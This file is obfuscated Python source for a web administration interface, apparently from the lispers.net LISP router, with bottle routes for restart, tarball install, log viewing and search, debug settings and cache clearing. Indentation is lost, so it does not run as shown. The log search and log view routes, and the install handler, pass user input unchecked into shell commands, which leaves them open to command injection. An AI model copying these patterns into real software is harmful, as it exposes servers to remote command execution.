if ( iIiIIIi [ - 2 ] == "lisp-core.pyo" and iIiIIIi [ - 1 ] == OoOo000oOo0oo ) : oo00O00oO = OoOo000oOo0oo
break
if 56 - 56: O0
return ( oo00O00oO )
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
@ bottle . route ( '/lisp/restart' )
def OO000o00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
OOoO = getoutput ( "egrep requiretty /etc/sudoers" ) . split ( " " )
if ( OOoO [ - 1 ] == "requiretty" and OOoO [ 0 ] == "Defaults" ) :
iIiIIIi = "Need to remove 'requiretty' from /etc/sudoers"
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
lisp . lprint ( lisp . bold ( "LISP subsystem restart request received" , False ) )
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
oo00O00oO = Oo0oOooo000OO ( )
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
Oo0O0 = "sleep 1; sudo ./RESTART-LISP {}" . format ( oo00O00oO )
threading . Thread ( target = Ii1Iii111IiI1 , args = [ Oo0O0 ] ) . start ( )
if 98 - 98: I1Ii111 - OoooooooOO % I1IiiI + O0 . Ii1I
iIiIIIi = lisp . lisp_print_sans ( "Restarting LISP subsystem ..." )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 56 - 56: II111iiii / oO0o + i11iIiiIii + OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
def Ii1Iii111IiI1 ( command ) :
os . system ( command )
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
@ bottle . route ( '/lisp/restart/verify' )
def II1II1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
iIiIIIi = "<br>Are you sure you want to restart the LISP subsystem?"
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
if 36 - 36: O0 + Oo0Ooo
IIi1IIIIi = lisp . lisp_button ( "yes" , "/lisp/restart" )
OOOoO = lisp . lisp_button ( "cancel" , "/lisp" )
iIiIIIi += IIi1IIIIi + OOOoO + "<br>"
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
@ bottle . route ( '/lisp/install' , method = "post" )
def oooo0OOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 72 - 72: O0 / ooOoO0o + OoooooooOO * iII111i
if 61 - 61: OoooooooOO % II111iiii - I1IiiI % I1ii11iIi11i + i1IIi
i1II = bottle . request . forms . get ( "image_url" )
if ( i1II . find ( "lispers.net" ) == - 1 or i1II . find ( ".tgz" ) == - 1 ) :
iIi1IiI = "Invalid install request for file {}" . format ( i1II )
lisp . lprint ( lisp . bold ( iIi1IiI , False ) )
iIiIIIi = lisp . lisp_print_sans ( "Invalid lispers.net tarball file name" )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if ( lisp . lisp_is_python2 ( ) ) :
O0ooOo0o0Oo = "python -O "
OooO0oOo = "pyo"
if 66 - 66: OoO0O00 * Oo0Ooo
if ( lisp . lisp_is_python3 ( ) ) :
O0ooOo0o0Oo = "python3.8 -O "
OooO0oOo = "pyc"
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if ( lisp . lisp_is_ubuntu ( ) ) :
oO0O = "{} lisp-get-bits.{} {} force 2>&1 > /dev/null" . format ( O0ooOo0o0Oo , OooO0oOo , i1II )
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
else :
oO0O = "{} lisp-get-bits.{} {} force >& /dev/null" . format ( O0ooOo0o0Oo , OooO0oOo , i1II )
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
i11i1iiiII = os . system ( oO0O )
if 78 - 78: I1ii11iIi11i + I11i - O0
i1I1iIi1IiI = i1II . split ( "/" ) [ - 1 ]
if 11 - 11: II111iiii
if ( os . path . exists ( i1I1iIi1IiI ) ) :
O00O00O000OOO = i1II . split ( "release-" ) [ 1 ]
O00O00O000OOO = O00O00O000OOO . split ( ".tgz" ) [ 0 ]
if 3 - 3: O0
iIiIIIi = "Install completed for release {}" . format ( O00O00O000OOO )
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
if 64 - 64: i1IIi % ooOoO0o / i11iIiiIii - i1IIi % OOooOOo . iII111i
iIiIIIi += "<br><br>" + lisp . lisp_button ( "restart LISP subsystem" ,
"/lisp/restart/verify" ) + "<br>"
else :
iIi1IiI = lisp . lisp_print_cour ( i1II )
iIiIIIi = "Install failed for file {}" . format ( iIi1IiI )
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
if 8 - 8: Oo0Ooo + II111iiii * OOooOOo * OoOoOO00 * I11i / IiII
if 21 - 21: oO0o / OoooooooOO
iIi1IiI = "Install request for file {} {}" . format ( i1II ,
"succeeded" if ( i11i1iiiII == 0 ) else "failed" )
lisp . lprint ( lisp . bold ( iIi1IiI , False ) )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 11 - 11: OOooOOo % Ii1I - i11iIiiIii - oO0o + ooOoO0o + IiII
if 87 - 87: I1Ii111 * i1IIi / I1ii11iIi11i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo - OoooooooOO % OOooOOo * OoOoOO00
if 69 - 69: i1IIi
if 59 - 59: II111iiii - o0oOOo0O0Ooo
if 24 - 24: Oo0Ooo - i1IIi + I11i
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
@ bottle . route ( '/lisp/install/image' )
def ooO00O00oOO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 40 - 40: iII111i . oO0o + I1IiiI + I1ii11iIi11i + I1Ii111
if 26 - 26: iIii1I11I1II1
iIi1IiI = lisp . lisp_print_sans ( "<br>Enter lispers.net tarball URL:" )
iIiIIIi = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>''' . format ( iIi1IiI )
if 87 - 87: I1ii11iIi11i / OoooooooOO - Oo0Ooo % OoOoOO00 % IiII % Oo0Ooo
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
if 45 - 45: I1ii11iIi11i + OoO0O00 * i11iIiiIii / OOooOOo % I11i * O0
if 17 - 17: O0
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
@ bottle . route ( '/lisp/log/flows' )
def IIIIIiII1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 45 - 45: I1IiiI / iII111i . iII111i
if 35 - 35: I1Ii111 . OoOoOO00 * i11iIiiIii
os . system ( "touch ./log-flows" )
if 44 - 44: i11iIiiIii / Oo0Ooo
iIiIIIi = lisp . lisp_print_sans ( "Flow data appended to file " )
Ii1IIi = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
iIiIIIi += lisp . lisp_print_cour ( Ii1IIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 43 - 43: I1Ii111 % iII111i
if 69 - 69: iII111i % OoO0O00
if 86 - 86: oO0o / oO0o
if 28 - 28: i11iIiiIii / o0oOOo0O0Ooo . iIii1I11I1II1 / II111iiii
if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
@ bottle . route ( '/lisp/search/log/<name>/<num>/<keyword>' )
def oo00ooOoo ( name = "" , num = "" , keyword = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 28 - 28: Ii1I
if 1 - 1: Ii1I
Oo0O0 = "tail -n {} logs/{}.log | egrep -B10 -A10 {}" . format ( num , name ,
keyword )
iIiIIIi = getoutput ( Oo0O0 )
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if ( iIiIIIi ) :
o00oo0000 = iIiIIIi . count ( keyword )
iIiIIIi = lisp . convert_font ( iIiIIIi )
iIiIIIi = iIiIIIi . replace ( "--\n--\n" , "--\n" )
iIiIIIi = iIiIIIi . replace ( "\n" , "<br>" )
iIiIIIi = iIiIIIi . replace ( "--<br>" , "<hr>" )
iIiIIIi = "Found <b>{}</b> occurences<hr>" . format ( o00oo0000 ) + iIiIIIi
else :
iIiIIIi = "Keyword {} not found" . format ( keyword )
if 44 - 44: Oo0Ooo % iIii1I11I1II1
if 90 - 90: II111iiii + OoooooooOO % OoooooooOO
if 35 - 35: iII111i / I1ii11iIi11i * OoooooooOO . II111iiii / Oo0Ooo
if 1 - 1: OoooooooOO + IiII . i1IIi % I11i
if 66 - 66: o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
I1 = "<font color='blue'><b>{}</b>" . format ( keyword )
iIiIIIi = iIiIIIi . replace ( keyword , I1 )
iIiIIIi = iIiIIIi . replace ( keyword , keyword + "</font>" )
if 13 - 13: OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - Oo0Ooo / oO0o
iIiIIIi = lisp . lisp_print_cour ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 8 - 8: OoOoOO00 / O0 * O0 % I1Ii111 - Oo0Ooo + I11i
if 83 - 83: O0 . I1IiiI
if 95 - 95: I11i . OoooooooOO - i1IIi - OoooooooOO - OoO0O00 % iIii1I11I1II1
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
if 41 - 41: ooOoO0o . Oo0Ooo + I1IiiI
if 100 - 100: Ii1I + OoO0O00
if 73 - 73: i1IIi - I1Ii111 % ooOoO0o / OoO0O00
@ bottle . post ( '/lisp/search/log/<name>/<num>' )
def III1iii1i11iI ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 56 - 56: i11iIiiIii . iIii1I11I1II1 + I1ii11iIi11i + iII111i / Oo0Ooo . I1Ii111
if 74 - 74: OoooooooOO % OOooOOo % I1Ii111 - I1IiiI - I11i
o0 = bottle . request . forms . get ( "keyword" )
return ( oo00ooOoo ( name , num , o0 ) )
if 35 - 35: IiII + i1IIi * oO0o - Ii1I . Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo
if 15 - 15: O0 / Oo0Ooo % I1ii11iIi11i + o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + O0
if 58 - 58: Oo0Ooo
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
@ bottle . route ( '/lisp/show/log/<name>/<num>' )
def Ii ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 99 - 99: OoO0O00 * i11iIiiIii . OoooooooOO % Oo0Ooo
if 76 - 76: O0 . I1Ii111 * iII111i * OOooOOo . OoOoOO00 . i11iIiiIii
if 21 - 21: o0oOOo0O0Ooo / OoOoOO00 / iIii1I11I1II1 % OOooOOo
if 2 - 2: i11iIiiIii - II111iiii / oO0o % O0
if 66 - 66: Oo0Ooo
if ( num == "" ) : num = 100
if 28 - 28: IiII - IiII . i1IIi - ooOoO0o + I1IiiI . IiII
oO0ooOOO = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
''' . format ( name , num )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if ( os . path . exists ( "logs/{}.log" . format ( name ) ) ) :
iIiIIIi = getoutput ( "tail -n {} logs/{}.log" . format ( num , name ) )
iIiIIIi = lisp . convert_font ( iIiIIIi )
iIiIIIi = iIiIIIi . replace ( "\n" , "<br>" )
iIiIIIi = oO0ooOOO + lisp . lisp_print_cour ( iIiIIIi )
else :
O00oOoo0OoO0 = lisp . lisp_print_sans ( "File" )
Ooo0 = lisp . lisp_print_cour ( "logs/{}.log" . format ( name ) )
oooO00o0 = lisp . lisp_print_sans ( "does not exist" )
iIiIIIi = "{} {} {}" . format ( O00oOoo0OoO0 , Ooo0 , oooO00o0 )
if 53 - 53: ooOoO0o
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 98 - 98: I1Ii111
if 92 - 92: I1Ii111 - iIii1I11I1II1
if 32 - 32: Ii1I % OoO0O00 * OoO0O00 + IiII * II111iiii * Ii1I
if 11 - 11: oO0o % II111iiii
if 57 - 57: OOooOOo / Oo0Ooo
if 69 - 69: oO0o - Oo0Ooo % IiII
if 50 - 50: OoooooooOO
@ bottle . route ( '/lisp/debug/<name>' )
def IiI1i111IiIiIi1 ( name = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 39 - 39: I11i - I1ii11iIi11i
if 53 - 53: o0oOOo0O0Ooo % iII111i + ooOoO0o . Oo0Ooo - I1ii11iIi11i % o0oOOo0O0Ooo
if 64 - 64: II111iiii
if 40 - 40: OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
if ( name == "disable%all" ) :
iiiI11 = lispconfig . lisp_get_clause_for_api ( "lisp debug" )
if ( "lisp debug" in iiiI11 [ 0 ] ) :
oooOo0OOOoo0 = [ ]
for I1i111i in iiiI11 [ 0 ] [ "lisp debug" ] :
iI1i = list ( I1i111i . keys ( ) ) [ 0 ]
oooOo0OOOoo0 . append ( { iI1i : "no" } )
if 46 - 46: I1Ii111 % Ii1I
oooOo0OOOoo0 = { "lisp debug" : oooOo0OOOoo0 }
lispconfig . lisp_put_clause_for_api ( oooOo0OOOoo0 )
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
iiiI11 = lispconfig . lisp_get_clause_for_api ( "lisp xtr-parameters" )
if ( "lisp xtr-parameters" in iiiI11 [ 0 ] ) :
oooOo0OOOoo0 = [ ]
for I1i111i in iiiI11 [ 0 ] [ "lisp xtr-parameters" ] :
iI1i = list ( I1i111i . keys ( ) ) [ 0 ]
if ( iI1i in [ "data-plane-logging" , "flow-logging" ] ) :
oooOo0OOOoo0 . append ( { iI1i : "no" } )
else :
oooOo0OOOoo0 . append ( { iI1i : I1i111i [ iI1i ] } )
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
oooOo0OOOoo0 = { "lisp xtr-parameters" : oooOo0OOOoo0 }
lispconfig . lisp_put_clause_for_api ( oooOo0OOOoo0 )
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
return ( lispconfig . lisp_landing_page ( ) )
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
name = name . split ( "%" )
III1I = name [ 0 ]
iiii11I = name [ 1 ]
if 11 - 11: ooOoO0o - OOooOOo + ooOoO0o * oO0o / I1IiiI
OoOOOO = [ "data-plane-logging" , "flow-logging" ]
if 18 - 18: ooOoO0o % i11iIiiIii . iIii1I11I1II1 - iII111i
OOOOoo = "lisp xtr-parameters" if ( III1I in OoOOOO ) else "lisp debug"
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
iiiI11 = lispconfig . lisp_get_clause_for_api ( OOOOoo )
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if ( OOOOoo in iiiI11 [ 0 ] ) :
oooOo0OOOoo0 = { }
for I1i111i in iiiI11 [ 0 ] [ OOOOoo ] :
oooOo0OOOoo0 [ list ( I1i111i . keys ( ) ) [ 0 ] ] = list ( I1i111i . values ( ) ) [ 0 ]
if ( III1I in oooOo0OOOoo0 ) : oooOo0OOOoo0 [ III1I ] = iiii11I
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
oooOo0OOOoo0 = { OOOOoo : oooOo0OOOoo0 }
lispconfig . lisp_put_clause_for_api ( oooOo0OOOoo0 )
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
return ( lispconfig . lisp_landing_page ( ) )
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
@ bottle . route ( '/lisp/clear/<name>' )
@ bottle . route ( '/lisp/clear/etr/<etr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/itr/<itr_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>' )
def iiIIi ( name = "" , itr_name = '' , rtr_name = "" , etr_name = "" ,
stats_name = "" ) :
if 36 - 36: I11i . II111iiii
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if ( lispconfig . lisp_is_user_superuser ( None ) == False ) :
iIiIIIi = lisp . lisp_print_sans ( "Not authorized" )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
O0ooo0O0oo0 = "clear"
if ( name == "referral" ) :
iIii11iI1II = "lisp-mr"
I1II1I1I = "Referral"
elif ( itr_name == "map-cache" ) :
iIii11iI1II = "lisp-itr"
I1II1I1I = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif ( rtr_name == "map-cache" ) :
iIii11iI1II = "lisp-rtr"
I1II1I1I = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif ( etr_name == "stats" ) :
iIii11iI1II = "lisp-etr"
I1II1I1I = ( "ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>" ) . format ( stats_name )
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
O0ooo0O0oo0 += "%" + stats_name
elif ( rtr_name == "stats" ) :
iIii11iI1II = "lisp-rtr"
I1II1I1I = ( "RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>" ) . format ( stats_name )
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
O0ooo0O0oo0 += "%" + stats_name
else :
iIiIIIi = lisp . lisp_print_sans ( "Invalid command" )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
O0ooo0O0oo0 = lisp . lisp_command_ipc ( O0ooo0O0oo0 , "lisp-core" )
lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , iIii11iI1II )
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
III1I1 = getoutput ( "egrep 'lisp map-cache' ./lisp.config" )
if ( III1I1 != "" ) :
os . system ( "touch ./lisp.config" )
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
iIiIIIi = lisp . lisp_print_sans ( "{} cleared" . format ( I1II1I1I ) )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
@ bottle . route ( '/lisp/show/map-server' )
def o0o0O00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 35 - 35: iIii1I11I1II1
if 94 - 94: OoOoOO00
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show map-server" ) )
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
@ bottle . route ( '/lisp/show/database' )
def OO0o0oO0O000o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 47 - 47: I1Ii111 - OoO0O00 / Ii1I * OoooooooOO / Ii1I . Oo0Ooo
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show database-mapping" ) )
if 34 - 34: ooOoO0o
if 27 - 27: I1Ii111 + OoooooooOO - OoOoOO00
if 15 - 15: oO0o / I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
if 44 - 44: Ii1I % i11iIiiIii - iII111i * I1ii11iIi11i + Oo0Ooo * OOooOOo
if 41 - 41: O0 * ooOoO0o - OoOoOO00 . Ii1I
@ bottle . route ( '/lisp/show/itr/map-cache' )
def oO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show itr-map-cache" ) )
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
@ bottle . route ( '/lisp/show/itr/rloc-probing' )
def O0oo0O0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 2 - 2: OoooooooOO . OOooOOo . IiII
return ( lispconfig . lisp_process_show_command ( Ooo ,
"show itr-rloc-probing" ) )
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
@ bottle . post ( '/lisp/show/itr/map-cache/lookup' )
def oOo00Ooo0o0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 33 - 33: I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
oo0O0o = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oo0O0o ) == False ) :
iIiIIIi = "Address '{}' has invalid format" . format ( oo0O0o )
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 13 - 13: iIii1I11I1II1 . OoOoOO00 * I1IiiI / oO0o * Ii1I
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
Oo0O0 = "show itr-map-cache" + "%" + oo0O0o
return ( lispconfig . lisp_process_show_command ( Ooo ,
Oo0O0 ) )
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
@ bottle . route ( '/lisp/show/rtr/map-cache' )
@ bottle . route ( '/lisp/show/rtr/map-cache/<dns>' )
def O0o00o000oO ( dns = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 62 - 62: I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
